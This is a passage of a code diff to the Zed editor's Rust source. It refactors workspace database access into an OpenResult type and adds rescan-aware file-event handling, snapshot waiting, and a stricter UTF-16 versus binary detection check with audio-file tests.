+pub fn merge_conflict_notification_id() -> NotificationId {
+ struct MergeConflictNotification;
+ NotificationId::unique::<MergeConflictNotification>()
+}
+
/// Workspace-local view of a remote participant's location.
#[derive(Clone, Copy, Debug, PartialEq, Eq)]
pub enum ParticipantLocation {
@@ -7442,9 +7558,11 @@ fn open_items(
})
}
+#[derive(Clone)]
enum ActivateInDirectionTarget {
Pane(Entity<Pane>),
Dock(Entity<Dock>),
+ Sidebar(FocusHandle),
}
fn notify_if_database_failed(window: WindowHandle<MultiWorkspace>, cx: &mut AsyncApp) {
@@ -7844,7 +7962,6 @@ impl Render for Workspace {
window,
cx,
)),
-
BottomDockLayout::RightAligned => div()
.flex()
.flex_row()
@@ -7903,7 +8020,6 @@ impl Render for Workspace {
.children(self.render_dock(DockPosition::Bottom, &self.bottom_dock, window, cx))
),
),
-
BottomDockLayout::Contained => div()
.flex()
.flex_row()
@@ -8155,9 +8271,10 @@ impl WorkspaceHandle for Entity<Workspace> {
}
pub async fn last_opened_workspace_location(
+ db: &WorkspaceDb,
fs: &dyn fs::Fs,
) -> Option<(WorkspaceId, SerializedWorkspaceLocation, PathList)> {
- DB.last_workspace(fs)
+ db.last_workspace(fs)
.await
.log_err()
.flatten()
@@ -8165,11 +8282,12 @@ pub async fn last_opened_workspace_location(
}
pub async fn last_session_workspace_locations(
+ db: &WorkspaceDb,
last_session_id: &str,
last_session_window_stack: Option<Vec<WindowId>>,
fs: &dyn fs::Fs,
) -> Option<Vec<SessionWorkspace>> {
- DB.last_session_workspace_locations(last_session_id, last_session_window_stack, fs)
+ db.last_session_workspace_locations(last_session_id, last_session_window_stack, fs)
.await
.log_err()
}
@@ -8194,7 +8312,7 @@ pub async fn restore_multiworkspace(
cx.update(|cx| open_workspace_by_id(first.workspace_id, app_state.clone(), None, cx))
.await?
} else {
- let (window, _items) = cx
+ let OpenResult { window, .. } = cx
.update(|cx| {
Workspace::new_local(
first.paths.paths().to_vec(),
@@ -8232,7 +8350,7 @@ pub async fn restore_multiworkspace(
Some(window_handle),
None,
None,
- true,
+ false,
cx,
)
})
@@ -8315,6 +8433,15 @@ actions!(
CopyRoomId,
]
);
+
+/// Opens the channel notes for a specific channel by its ID.
+#[derive(Clone, PartialEq, Deserialize, JsonSchema, Action)]
+#[action(namespace = collab)]
+#[serde(deny_unknown_fields)]
+pub struct OpenChannelNotesById {
+ pub channel_id: u64,
+}
+
actions!(
zed,
[
@@ -8494,7 +8621,10 @@ pub fn join_channel(
let mut active_window = requesting_window.or_else(|| activate_any_workspace_window(cx));
if active_window.is_none() {
// no open workspaces, make one to show the error in (blergh)
- let (window_handle, _) = cx
+ let OpenResult {
+ window: window_handle,
+ ..
+ } = cx
.update(|cx| {
Workspace::new_local(
vec![],
@@ -8750,6 +8880,14 @@ pub struct OpenOptions {
pub env: Option<HashMap<String, String>>,
}
+/// The result of opening a workspace via [`open_paths`], [`Workspace::new_local`],
+/// or [`Workspace::open_workspace_for_paths`].
+pub struct OpenResult {
+ pub window: WindowHandle<MultiWorkspace>,
+ pub workspace: Entity<Workspace>,
+ pub opened_items: Vec<Option<anyhow::Result<Box<dyn ItemHandle>>>>,
+}
+
/// Opens a workspace by its database ID, used for restoring empty workspaces with unsaved content.
pub fn open_workspace_by_id(
workspace_id: WorkspaceId,
@@ -8771,8 +8909,10 @@ pub fn open_workspace_by_id(
cx,
);
+ let db = WorkspaceDb::global(cx);
+ let kvp = db::kvp::KeyValueStore::global(cx);
cx.spawn(async move |cx| {
- let serialized_workspace = persistence::DB
+ let serialized_workspace = db
.workspace_for_id(workspace_id)
.with_context(|| format!("Workspace {workspace_id:?} not found"))?;
@@ -8804,7 +8944,7 @@ pub fn open_workspace_by_id(
&& let Some(bounds) = serialized_workspace.window_bounds.as_ref()
{
(Some(bounds.0), Some(display))
- } else if let Some((display, bounds)) = persistence::read_default_window_bounds() {
+ } else if let Some((display, bounds)) = persistence::read_default_window_bounds(&kvp) {
(Some(bounds), Some(display))
} else {
(None, None)
@@ -8869,12 +9009,7 @@ pub fn open_paths(
app_state: Arc<AppState>,
open_options: OpenOptions,
cx: &mut App,
-) -> Task<
- anyhow::Result<(
- WindowHandle<MultiWorkspace>,
- Vec<Option<anyhow::Result<Box<dyn ItemHandle>>>>,
- )>,
-> {
+) -> Task<anyhow::Result<OpenResult>> {
let abs_paths = abs_paths.to_vec();
#[cfg(target_os = "windows")]
let wsl_path = abs_paths
@@ -8953,7 +9088,7 @@ pub fn open_paths(
});
});
- Ok((existing, open_task))
+ Ok(OpenResult { window: existing, workspace: target_workspace, opened_items: open_task })
} else {
let result = cx
.update(move |cx| {
@@ -8969,8 +9104,8 @@ pub fn open_paths(
})
.await;
- if let Ok((ref window_handle, _)) = result {
- window_handle
+ if let Ok(ref result) = result {
+ result.window
.update(cx, |_, window, _cx| {
window.activate_window();
})
@@ -8982,9 +9117,9 @@ pub fn open_paths(
#[cfg(target_os = "windows")]
if let Some(util::paths::WslPath{distro, path}) = wsl_path
- && let Ok((multi_workspace_window, _)) = &result
+ && let Ok(ref result) = result
{
- multi_workspace_window
+ result.window
.update(cx, move |multi_workspace, _window, cx| {
struct OpenInWsl;
let workspace = multi_workspace.workspace().clone();
@@ -9031,7 +9166,7 @@ pub fn open_new(
cx,
);
cx.spawn(async move |cx| {
- let (window, _opened_paths) = task.await?;
+ let OpenResult { window, .. } = task.await?;
window
.update(cx, |_, window, _cx| {
window.activate_window();
@@ -9177,7 +9312,8 @@ async fn open_remote_project_inner(
window: WindowHandle<MultiWorkspace>,
cx: &mut AsyncApp,
) -> Result<Vec<Option<Box<dyn ItemHandle>>>> {
- let toolchains = DB.toolchains(workspace_id).await?;
+ let db = cx.update(|cx| WorkspaceDb::global(cx));
+ let toolchains = db.toolchains(workspace_id).await?;
for (toolchain, worktree_path, path) in toolchains {
project
.update(cx, |this, cx| {
@@ -9267,20 +9403,20 @@ fn deserialize_remote_project(
paths: Vec<PathBuf>,
cx: &AsyncApp,
) -> Task<Result<(WorkspaceId, Option<SerializedWorkspace>)>> {
+ let db = cx.update(|cx| WorkspaceDb::global(cx));
cx.background_spawn(async move {
- let remote_connection_id = persistence::DB
+ let remote_connection_id = db
.get_or_create_remote_connection(connection_options)
.await?;
- let serialized_workspace =
- persistence::DB.remote_workspace_for_roots(&paths, remote_connection_id);
+ let serialized_workspace = db.remote_workspace_for_roots(&paths, remote_connection_id);
let workspace_id = if let Some(workspace_id) =
serialized_workspace.as_ref().map(|workspace| workspace.id)
{
workspace_id
} else {
- persistence::DB.next_id().await?
+ db.next_id().await?
};
Ok((workspace_id, serialized_workspace))
@@ -9899,14 +10035,15 @@ pub fn remote_workspace_position_from_db(
cx: &App,
) -> Task<Result<WorkspacePosition>> {
let paths = paths_to_open.to_vec();
+ let db = WorkspaceDb::global(cx);
+ let kvp = db::kvp::KeyValueStore::global(cx);
cx.background_spawn(async move {
- let remote_connection_id = persistence::DB
+ let remote_connection_id = db
.get_or_create_remote_connection(connection_options)
.await
.context("fetching serialized ssh project")?;
- let serialized_workspace =
- persistence::DB.remote_workspace_for_roots(&paths, remote_connection_id);
+ let serialized_workspace = db.remote_workspace_for_roots(&paths, remote_connection_id);
let (window_bounds, display) = if let Some(bounds) = window_bounds_env_override() {
(Some(WindowBounds::Windowed(bounds)), None)
@@ -9916,7 +10053,7 @@ pub fn remote_workspace_position_from_db(
.and_then(|workspace| {
Some((workspace.display?, workspace.window_bounds.map(|b| b.0)?))
})
- .or_else(|| persistence::read_default_window_bounds());
+ .or_else(|| persistence::read_default_window_bounds(&kvp));
if let Some((serialized_display, serialized_bounds)) = restorable_bounds {
(Some(serialized_bounds), Some(serialized_display))
@@ -9973,7 +10110,7 @@ pub fn with_active_or_new_workspace(
#[cfg(test)]
mod tests {
- use std::{cell::RefCell, rc::Rc};
+ use std::{cell::RefCell, rc::Rc, sync::Arc, time::Duration};
use super::*;
use crate::{
@@ -9991,6 +10128,7 @@ mod tests {
use project::{Project, ProjectEntryId};
use serde_json::json;
use settings::SettingsStore;
+ use util::path;
use util::rel_path::rel_path;
#[gpui::test]
@@ -10942,6 +11080,7 @@ mod tests {
assert!(workspace.right_dock().read(cx).is_open());
assert!(!panel.is_zoomed(window, cx));
assert!(!panel.read(cx).focus_handle(cx).contains_focused(window, cx));
+ assert!(pane.read(cx).focus_handle(cx).contains_focused(window, cx));
});
// Close the dock
@@ -10953,6 +11092,7 @@ mod tests {
assert!(!workspace.right_dock().read(cx).is_open());
assert!(!panel.is_zoomed(window, cx));
assert!(!panel.read(cx).focus_handle(cx).contains_focused(window, cx));
+ assert!(pane.read(cx).focus_handle(cx).contains_focused(window, cx));
});
// Open the dock
@@ -13545,10 +13685,79 @@ mod tests {
cx.update(|cx| {
let settings_store = SettingsStore::test(cx);
cx.set_global(settings_store);
+ cx.set_global(db::AppDatabase::test_new());
theme::init(theme::LoadThemes::JustBase, cx);
});
}
+ #[gpui::test]
+ async fn test_toggle_theme_mode_persists_and_updates_active_theme(cx: &mut TestAppContext) {
+ use settings::{ThemeName, ThemeSelection};
+ use theme::SystemAppearance;
+ use zed_actions::theme::ToggleMode;
+
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ let settings_fs: Arc<dyn fs::Fs> = fs.clone();
+
+ fs.insert_tree(path!("/root"), json!({ "file.rs": "fn main() {}\n" }))
+ .await;
+
+ // Build a test project and workspace view so the test can invoke
+ // the workspace action handler the same way the UI would.
+ let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await;
+ let (workspace, cx) =
+ cx.add_window_view(|window, cx| Workspace::test_new(project.clone(), window, cx));
+
+ // Seed the settings file with a plain static light theme so the
+ // first toggle always starts from a known persisted state.
+ workspace.update_in(cx, |_workspace, _window, cx| {
+ *SystemAppearance::global_mut(cx) = SystemAppearance(theme::Appearance::Light);
+ settings::update_settings_file(settings_fs.clone(), cx, |settings, _cx| {
+ settings.theme.theme = Some(ThemeSelection::Static(ThemeName("One Light".into())));
+ });
+ });
+ cx.executor().advance_clock(Duration::from_millis(200));
+ cx.run_until_parked();
+
+ // Confirm the initial persisted settings contain the static theme
+ // we just wrote before any toggling happens.
+ let settings_text = SettingsStore::load_settings(&settings_fs).await.unwrap();
+ assert!(settings_text.contains(r#""theme": "One Light""#));
+
+ // Toggle once. This should migrate the persisted theme settings
+ // into light/dark slots and enable system mode.
+ workspace.update_in(cx, |workspace, window, cx| {
+ workspace.toggle_theme_mode(&ToggleMode, window, cx);
+ });
+ cx.executor().advance_clock(Duration::from_millis(200));
+ cx.run_until_parked();
+
+ // 1. Static -> Dynamic
+ // this assertion checks theme changed from static to dynamic.
+ let settings_text = SettingsStore::load_settings(&settings_fs).await.unwrap();
+ let parsed: serde_json::Value = settings::parse_json_with_comments(&settings_text).unwrap();
+ assert_eq!(
+ parsed["theme"],
+ serde_json::json!({
+ "mode": "system",
+ "light": "One Light",
+ "dark": "One Dark"
+ })
+ );
+
+ // 2. Toggle again, suppose it will change the mode to light
+ workspace.update_in(cx, |workspace, window, cx| {
+ workspace.toggle_theme_mode(&ToggleMode, window, cx);
+ });
+ cx.executor().advance_clock(Duration::from_millis(200));
+ cx.run_until_parked();
+
+ let settings_text = SettingsStore::load_settings(&settings_fs).await.unwrap();
+ assert!(settings_text.contains(r#""mode": "light""#));
+ }
+
fn dirty_project_item(id: u64, path: &str, cx: &mut App) -> Entity<TestProjectItem> {
let item = TestProjectItem::new(id, path, cx);
item.update(cx, |item, _| {
@@ -128,6 +128,7 @@ pub struct LocalWorktree {
scan_requests_tx: channel::Sender<ScanRequest>,
path_prefixes_to_scan_tx: channel::Sender<PathPrefixScanRequest>,
is_scanning: (watch::Sender<bool>, watch::Receiver<bool>),
+ snapshot_subscriptions: VecDeque<(usize, oneshot::Sender<()>)>,
_background_scanner_tasks: Vec<Task<()>>,
update_observer: Option<UpdateObservationState>,
fs: Arc<dyn Fs>,
@@ -267,6 +268,12 @@ struct BackgroundScannerState {
scanning_enabled: bool,
}
+#[derive(Clone, Debug, Eq, PartialEq)]
+struct EventRoot {
+ path: Arc<RelPath>,
+ was_rescanned: bool,
+}
+
#[derive(Debug, Clone)]
struct LocalRepositoryEntry {
work_directory_id: ProjectEntryId,
@@ -464,6 +471,7 @@ impl Worktree {
next_entry_id,
snapshot,
is_scanning: watch::channel_with(true),
+ snapshot_subscriptions: Default::default(),
update_observer: None,
scan_requests_tx,
path_prefixes_to_scan_tx,
@@ -708,6 +716,16 @@ impl Worktree {
}
}
+ pub fn wait_for_snapshot(
+ &mut self,
+ scan_id: usize,
+ ) -> impl Future<Output = Result<()>> + use<> {
+ match self {
+ Worktree::Local(this) => this.wait_for_snapshot(scan_id).boxed(),
+ Worktree::Remote(this) => this.wait_for_snapshot(scan_id).boxed(),
+ }
+ }
+
#[cfg(feature = "test-support")]
pub fn has_update_observer(&self) -> bool {
match self {
@@ -1164,6 +1182,15 @@ impl LocalWorktree {
if !repo_changes.is_empty() {
cx.emit(Event::UpdatedGitRepositories(repo_changes));
}
+
+ while let Some((scan_id, _)) = self.snapshot_subscriptions.front() {
+ if self.snapshot.completed_scan_id >= *scan_id {
+ let (_, tx) = self.snapshot_subscriptions.pop_front().unwrap();
+ tx.send(()).ok();
+ } else {
+ break;
+ }
+ }
}
fn changed_repos(
@@ -1280,6 +1307,28 @@ impl LocalWorktree {
}
}
+ pub fn wait_for_snapshot(
+ &mut self,
+ scan_id: usize,
+ ) -> impl Future<Output = Result<()>> + use<> {
+ let (tx, rx) = oneshot::channel();
+ if self.snapshot.completed_scan_id >= scan_id {
+ tx.send(()).ok();
+ } else {
+ match self
+ .snapshot_subscriptions
+ .binary_search_by_key(&scan_id, |probe| probe.0)
+ {
+ Ok(ix) | Err(ix) => self.snapshot_subscriptions.insert(ix, (scan_id, tx)),
+ }
+ }
+
+ async move {
+ rx.await?;
+ Ok(())
+ }
+ }
+
pub fn snapshot(&self) -> LocalSnapshot {
self.snapshot.clone()
}
@@ -1322,6 +1371,7 @@ impl LocalWorktree {
path,
disk_state: DiskState::Present {
mtime: metadata.mtime,
+ size: metadata.len,
},
is_local: true,
is_private,
@@ -1378,6 +1428,7 @@ impl LocalWorktree {
path,
disk_state: DiskState::Present {
mtime: metadata.mtime,
+ size: metadata.len,
},
is_local: true,
is_private,
@@ -1575,6 +1626,7 @@ impl LocalWorktree {
path,
disk_state: DiskState::Present {
mtime: metadata.mtime,
+ size: metadata.len,
},
entry_id: None,
is_local: true,
@@ -3289,7 +3341,10 @@ impl File {
worktree,
path: entry.path.clone(),
disk_state: if let Some(mtime) = entry.mtime {
- DiskState::Present { mtime }
+ DiskState::Present {
+ mtime,
+ size: entry.size,
+ }
} else {
DiskState::New
},
@@ -3318,7 +3373,7 @@ impl File {
} else if proto.is_deleted {
DiskState::Deleted
} else if let Some(mtime) = proto.mtime.map(&Into::into) {
- DiskState::Present { mtime }
+ DiskState::Present { mtime, size: 0 }
} else {
DiskState::New
};
@@ -3874,7 +3929,7 @@ impl BackgroundScanner {
state.snapshot.completed_scan_id = state.snapshot.scan_id;
}
- self.send_status_update(false, SmallVec::new()).await;
+ self.send_status_update(false, SmallVec::new(), &[]).await;
    // Process any FS events that occurred while performing the initial scan.
// For these events, update events cannot be as precise, because we didn't
@@ -3887,14 +3942,17 @@ impl BackgroundScanner {
self.process_events(
paths
.into_iter()
- .filter(|e| e.kind.is_some())
- .map(Into::into)
+ .filter(|event| event.kind.is_some())
.collect(),
)
.await;
}
if let Some(abs_path) = containing_git_repository {
- self.process_events(vec![abs_path]).await;
+ self.process_events(vec![PathEvent {
+ path: abs_path,
+ kind: Some(fs::PathEventKind::Changed),
+ }])
+ .await;
}
// Continue processing events until the worktree is dropped.
@@ -3925,10 +3983,14 @@ impl BackgroundScanner {
};
if let Some(abs_path) = self.fs.canonicalize(&abs_path).await.log_err() {
- self.process_events(vec![abs_path]).await;
+ self.process_events(vec![PathEvent {
+ path: abs_path,
+ kind: Some(fs::PathEventKind::Changed),
+ }])
+ .await;
}
}
- self.send_status_update(false, request.done).await;
+ self.send_status_update(false, request.done, &[]).await;
}
paths = fs_events_rx.next().fuse() => {
@@ -3936,7 +3998,7 @@ impl BackgroundScanner {
while let Poll::Ready(Some(more_paths)) = futures::poll!(fs_events_rx.next()) {
paths.extend(more_paths);
}
- self.process_events(paths.into_iter().filter(|e| e.kind.is_some()).map(Into::into).collect()).await;
+ self.process_events(paths.into_iter().filter(|event| event.kind.is_some()).collect()).await;
}
_ = global_gitignore_events.next().fuse() => {
@@ -3993,11 +4055,10 @@ impl BackgroundScanner {
)
.await;
- self.send_status_update(scanning, request.done).await
+ self.send_status_update(scanning, request.done, &[]).await
}
- async fn process_events(&self, mut abs_paths: Vec<PathBuf>) {
- log::trace!("process events: {abs_paths:?}");
+ async fn process_events(&self, mut events: Vec<PathEvent>) {
let root_path = self.state.lock().await.snapshot.abs_path.clone();
let root_canonical_path = self.fs.canonicalize(root_path.as_path()).await;
let root_canonical_path = match &root_canonical_path {
@@ -4041,11 +4102,25 @@ impl BackgroundScanner {
let skipped_files_in_dot_git = [COMMIT_MESSAGE, INDEX_LOCK];
let skipped_dirs_in_dot_git = [FSMONITOR_DAEMON, LFS_DIR];
- let mut relative_paths = Vec::with_capacity(abs_paths.len());
+ let mut relative_paths = Vec::with_capacity(events.len());
let mut dot_git_abs_paths = Vec::new();
let mut work_dirs_needing_exclude_update = Vec::new();
- abs_paths.sort_unstable();
- abs_paths.dedup_by(|a, b| a.starts_with(b));
+ events.sort_unstable_by(|left, right| left.path.cmp(&right.path));
+ events.dedup_by(|left, right| {
+ if left.path == right.path {
+ if matches!(left.kind, Some(fs::PathEventKind::Rescan)) {
+ right.kind = left.kind;
+ }
+ true
+ } else if left.path.starts_with(&right.path) {
+ if matches!(left.kind, Some(fs::PathEventKind::Rescan)) {
+ right.kind = left.kind;
+ }
+ true
+ } else {
+ false
+ }
+ });
{
let snapshot = &self.state.lock().await.snapshot;
@@ -4061,8 +4136,8 @@ impl BackgroundScanner {
}
}
- for (ix, abs_path) in abs_paths.iter().enumerate() {
- let abs_path = &SanitizedPath::new(&abs_path);
+ for (ix, event) in events.iter().enumerate() {
+ let abs_path = &SanitizedPath::new(&event.path);
let mut is_git_related = false;
let mut dot_git_paths = None;
@@ -4162,11 +4237,14 @@ impl BackgroundScanner {
continue;
}
- relative_paths.push(relative_path.into_arc());
+ relative_paths.push(EventRoot {
+ path: relative_path.into_arc(),
+ was_rescanned: matches!(event.kind, Some(fs::PathEventKind::Rescan)),
+ });
}
for range_to_drop in ranges_to_drop.into_iter().rev() {
- abs_paths.drain(range_to_drop);
+ events.drain(range_to_drop);
}
}
@@ -4190,12 +4268,24 @@ impl BackgroundScanner {
self.state.lock().await.snapshot.scan_id += 1;
let (scan_job_tx, scan_job_rx) = channel::unbounded();
- log::debug!("received fs events {:?}", relative_paths);
+ log::debug!(
+ "received fs events {:?}",
+ relative_paths
+ .iter()
+ .map(|event_root| &event_root.path)
+ .collect::<Vec<_>>()
+ );
self.reload_entries_for_paths(
&root_path,
&root_canonical_path,
- &relative_paths,
- abs_paths,
+ &relative_paths
+ .iter()
+ .map(|event_root| event_root.path.clone())
+ .collect::<Vec<_>>(),
+ events
+ .into_iter()
+ .map(|event| event.path)
+ .collect::<Vec<_>>(),
Some(scan_job_tx.clone()),
)
.await;
@@ -4223,7 +4313,8 @@ impl BackgroundScanner {
state.scanned_dirs.remove(&entry.id);
}
}
- self.send_status_update(false, SmallVec::new()).await;
+ self.send_status_update(false, SmallVec::new(), &relative_paths)
+ .await;
}
async fn update_global_gitignore(&self, abs_path: &Path) {
@@ -4249,7 +4340,7 @@ impl BackgroundScanner {
)
.await;
self.scan_dirs(false, scan_job_rx).await;
- self.send_status_update(false, SmallVec::new()).await;
+ self.send_status_update(false, SmallVec::new(), &[]).await;
}
async fn forcibly_load_paths(&self, paths: &[Arc<RelPath>]) -> bool {
@@ -4330,7 +4421,8 @@ impl BackgroundScanner {
) {
Ok(_) => {
last_progress_update_count += 1;
- self.send_status_update(true, SmallVec::new()).await;
+ self.send_status_update(true, SmallVec::new(), &[])
+ .await;
}
Err(count) => {
last_progress_update_count = count;
@@ -4359,19 +4451,22 @@ impl BackgroundScanner {
&self,
scanning: bool,
barrier: SmallVec<[barrier::Sender; 1]>,
+ event_roots: &[EventRoot],
) -> bool {
let mut state = self.state.lock().await;
- if state.changed_paths.is_empty() && scanning {
+ if state.changed_paths.is_empty() && event_roots.is_empty() && scanning {
return true;
}
+ let merged_event_roots = merge_event_roots(&state.changed_paths, event_roots);
+
let new_snapshot = state.snapshot.clone();
let old_snapshot = mem::replace(&mut state.prev_snapshot, new_snapshot.snapshot.clone());
let changes = build_diff(
self.phase,
&old_snapshot,
&new_snapshot,
- &state.changed_paths,
+ &merged_event_roots,
);
state.changed_paths.clear();
@@ -5225,11 +5320,40 @@ async fn discover_ancestor_git_repo(
(ignores, exclude, None)
}
+fn merge_event_roots(changed_paths: &[Arc<RelPath>], event_roots: &[EventRoot]) -> Vec<EventRoot> {
+ let mut merged_event_roots = Vec::with_capacity(changed_paths.len() + event_roots.len());
+ let mut changed_paths = changed_paths.iter().peekable();
+ let mut event_roots = event_roots.iter().peekable();
+ while let (Some(path), Some(event_root)) = (changed_paths.peek(), event_roots.peek()) {
+ match path.cmp(&&event_root.path) {
+ Ordering::Less => {
+ merged_event_roots.push(EventRoot {
+ path: (*changed_paths.next().expect("peeked changed path")).clone(),
+ was_rescanned: false,
+ });
+ }
+ Ordering::Equal => {
+ merged_event_roots.push((*event_roots.next().expect("peeked event root")).clone());
+ changed_paths.next();
+ }
+ Ordering::Greater => {
+ merged_event_roots.push((*event_roots.next().expect("peeked event root")).clone());
+ }
+ }
+ }
+ merged_event_roots.extend(changed_paths.map(|path| EventRoot {
+ path: path.clone(),
+ was_rescanned: false,
+ }));
+ merged_event_roots.extend(event_roots.cloned());
+ merged_event_roots
+}
+
fn build_diff(
phase: BackgroundScannerPhase,
old_snapshot: &Snapshot,
new_snapshot: &Snapshot,
- event_paths: &[Arc<RelPath>],
+ event_roots: &[EventRoot],
) -> UpdatedEntriesSet {
use BackgroundScannerPhase::*;
use PathChange::{Added, AddedOrUpdated, Loaded, Removed, Updated};
@@ -5237,13 +5361,14 @@ fn build_diff(
// Identify which paths have changed. Use the known set of changed
// parent paths to optimize the search.
let mut changes = Vec::new();
+
let mut old_paths = old_snapshot.entries_by_path.cursor::<PathKey>(());
let mut new_paths = new_snapshot.entries_by_path.cursor::<PathKey>(());
let mut last_newly_loaded_dir_path = None;
old_paths.next();
new_paths.next();
- for path in event_paths {
- let path = PathKey(path.clone());
+ for event_root in event_roots {
+ let path = PathKey(event_root.path.clone());
if old_paths.item().is_some_and(|e| e.path < path.0) {
old_paths.seek_forward(&path, Bias::Left);
}
@@ -5289,6 +5414,8 @@ fn build_diff(
} else {
changes.push((new_entry.path.clone(), new_entry.id, Updated));
}
+ } else if event_root.was_rescanned {
+ changes.push((new_entry.path.clone(), new_entry.id, Updated));
}
old_paths.next();
new_paths.next();
@@ -6055,7 +6182,7 @@ fn decode_byte_full(
}
}
-#[derive(PartialEq)]
+#[derive(Debug, PartialEq)]
enum ByteContent {
Utf16Le,
Utf16Be,
@@ -6111,13 +6238,24 @@ fn analyze_byte_content(bytes: &[u8]) -> ByteContent {
return ByteContent::Unknown;
}
- if total_null_count >= limit / 16 {
- if even_null_count > odd_null_count * 4 {
+ let has_significant_nulls = total_null_count >= limit / 16;
+ let nulls_skew_to_even = even_null_count > odd_null_count * 4;
+ let nulls_skew_to_odd = odd_null_count > even_null_count * 4;
+
+ if has_significant_nulls {
+ let sample = &bytes[..limit];
+
+ // UTF-16BE ASCII: [0x00, char] — nulls at even positions (high byte first)
+ // UTF-16LE ASCII: [char, 0x00] — nulls at odd positions (low byte first)
+
+ if nulls_skew_to_even && is_plausible_utf16_text(sample, false) {
return ByteContent::Utf16Be;
}
- if odd_null_count > even_null_count * 4 {
+
+ if nulls_skew_to_odd && is_plausible_utf16_text(sample, true) {
return ByteContent::Utf16Le;
}
+
return ByteContent::Binary;
}
@@ -6139,4 +6277,208 @@ fn is_known_binary_header(bytes: &[u8]) -> bool {
|| bytes.starts_with(b"GIF89a") // GIF89a
|| bytes.starts_with(b"IWAD") // Doom IWAD archive
|| bytes.starts_with(b"PWAD") // Doom PWAD archive
+ || bytes.starts_with(b"RIFF") // WAV, AVI, WebP
+ || bytes.starts_with(b"OggS") // OGG (Vorbis, Opus, FLAC)
+ || bytes.starts_with(b"fLaC") // FLAC
+ || bytes.starts_with(b"ID3") // MP3 with ID3v2 tag
+ || bytes.starts_with(b"\xFF\xFB") // MP3 frame sync (MPEG1 Layer3)
+ || bytes.starts_with(b"\xFF\xFA") // MP3 frame sync (MPEG1 Layer3)
+ || bytes.starts_with(b"\xFF\xF3") // MP3 frame sync (MPEG2 Layer3)
+ || bytes.starts_with(b"\xFF\xF2") // MP3 frame sync (MPEG2 Layer3)
+}
+
+// Null byte skew alone is not enough to identify UTF-16 -- binary formats with
+// small 16-bit values (like PCM audio) produce the same pattern. Decode the
+// bytes as UTF-16 and reject if too many code units land in control character
+// ranges or form unpaired surrogates, which real text almost never contains.
+fn is_plausible_utf16_text(bytes: &[u8], little_endian: bool) -> bool {
+ let mut suspicious_count = 0usize;
+ let mut total = 0usize;
+
+ let mut i = 0;
+ while let Some(code_unit) = read_u16(bytes, i, little_endian) {
+ total += 1;
+
+ match code_unit {
+ 0x0009 | 0x000A | 0x000C | 0x000D => {}
+ // C0/C1 control characters and non-characters
+ 0x0000..=0x001F | 0x007F..=0x009F | 0xFFFE | 0xFFFF => suspicious_count += 1,
+ 0xD800..=0xDBFF => {
+ let next_offset = i + 2;
+ let has_low_surrogate = read_u16(bytes, next_offset, little_endian)
+ .is_some_and(|next| (0xDC00..=0xDFFF).contains(&next));
+ if has_low_surrogate {
+ total += 1;
+ i += 2;
+ } else {
+ suspicious_count += 1;
+ }
+ }
+ // Lone low surrogate without a preceding high surrogate
+ 0xDC00..=0xDFFF => suspicious_count += 1,
+ _ => {}
+ }
+
+ i += 2;
+ }
+
+ if total == 0 {
+ return false;
+ }
+
+ // Real UTF-16 text has near-zero control characters; binary data with
+ // small 16-bit values typically exceeds 5%. 2% provides a safe margin.
+ suspicious_count * 100 < total * 2
+}
+
+fn read_u16(bytes: &[u8], offset: usize, little_endian: bool) -> Option<u16> {
+ let pair = [*bytes.get(offset)?, *bytes.get(offset + 1)?];
+ if little_endian {
+ return Some(u16::from_le_bytes(pair));
+ }
+ Some(u16::from_be_bytes(pair))
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ /// reproduction of issue #50785
+ fn build_pcm16_wav_bytes() -> Vec<u8> {
+ let header: Vec<u8> = vec![
+ /* RIFF header */
+ 0x52, 0x49, 0x46, 0x46, // "RIFF"
+        0xc6, 0xcf, 0x00, 0x00, // RIFF chunk size: 0xcfc6 = 53190 (file size - 8)
+ 0x57, 0x41, 0x56, 0x45, // "WAVE"
+ /* fmt chunk */
+ 0x66, 0x6d, 0x74, 0x20, // "fmt "
+ 0x10, 0x00, 0x00, 0x00, // chunk size: 16
+ 0x01, 0x00, // format: PCM (1)
+ 0x01, 0x00, // channels: 1 (mono)
+ 0x80, 0x3e, 0x00, 0x00, // sample rate: 16000
+ 0x00, 0x7d, 0x00, 0x00, // byte rate: 32000
+ 0x02, 0x00, // block align: 2
+ 0x10, 0x00, // bits per sample: 16
+ /* LIST chunk */
+ 0x4c, 0x49, 0x53, 0x54, // "LIST"
+ 0x1a, 0x00, 0x00, 0x00, // chunk size: 26
+ 0x49, 0x4e, 0x46, 0x4f, // "INFO"
+ 0x49, 0x53, 0x46, 0x54, // "ISFT"
+ 0x0d, 0x00, 0x00, 0x00, // sub-chunk size: 13
+ 0x4c, 0x61, 0x76, 0x66, 0x36, 0x32, 0x2e, 0x33, // "Lavf62.3"
+ 0x2e, 0x31, 0x30, 0x30, 0x00, // ".100\0"
+        /* padding byte for word alignment (ISFT sub-chunk size 13 is odd) */
+        0x00,
+        0x64, 0x61, 0x74, 0x61, // "data" chunk header
+        0x80, 0xcf, 0x00, 0x00, // chunk size
+ ];
+
+ let mut bytes = header;
+
+ // fill remaining space up to `FILE_ANALYSIS_BYTES` with synthetic PCM
+ let audio_bytes_needed = FILE_ANALYSIS_BYTES - bytes.len();
+ for i in 0..(audio_bytes_needed / 2) {
+ let sample = (i & 0xFF) as u8;
+ bytes.push(sample); // low byte: varies
+ bytes.push(0x00); // high byte: zero for small values
+ }
+
+ bytes
+ }
+
+ #[test]
+ fn test_pcm16_wav_detected_as_binary() {
+ let wav_bytes = build_pcm16_wav_bytes();
+ assert_eq!(wav_bytes.len(), FILE_ANALYSIS_BYTES);
+
+ let result = analyze_byte_content(&wav_bytes);
+ assert_eq!(
+ result,
+ ByteContent::Binary,
+ "PCM 16-bit WAV should be detected as Binary via RIFF header"
+ );
+ }
+
+ #[test]
+ fn test_le16_binary_not_misdetected_as_utf16le() {
+ let mut bytes = b"FAKE".to_vec();
+ while bytes.len() < FILE_ANALYSIS_BYTES {
+ let sample = (bytes.len() & 0xFF) as u8;
+ bytes.push(sample);
+ bytes.push(0x00);
+ }
+ bytes.truncate(FILE_ANALYSIS_BYTES);
+
+ let result = analyze_byte_content(&bytes);
+ assert_eq!(
+ result,
+ ByteContent::Binary,
+ "LE 16-bit binary with control characters should be detected as Binary"
+ );
+ }
+
+ #[test]
+ fn test_be16_binary_not_misdetected_as_utf16be() {
+ let mut bytes = b"FAKE".to_vec();
+ while bytes.len() < FILE_ANALYSIS_BYTES {
+ bytes.push(0x00);
+ let sample = (bytes.len() & 0xFF) as u8;
+ bytes.push(sample);
+ }
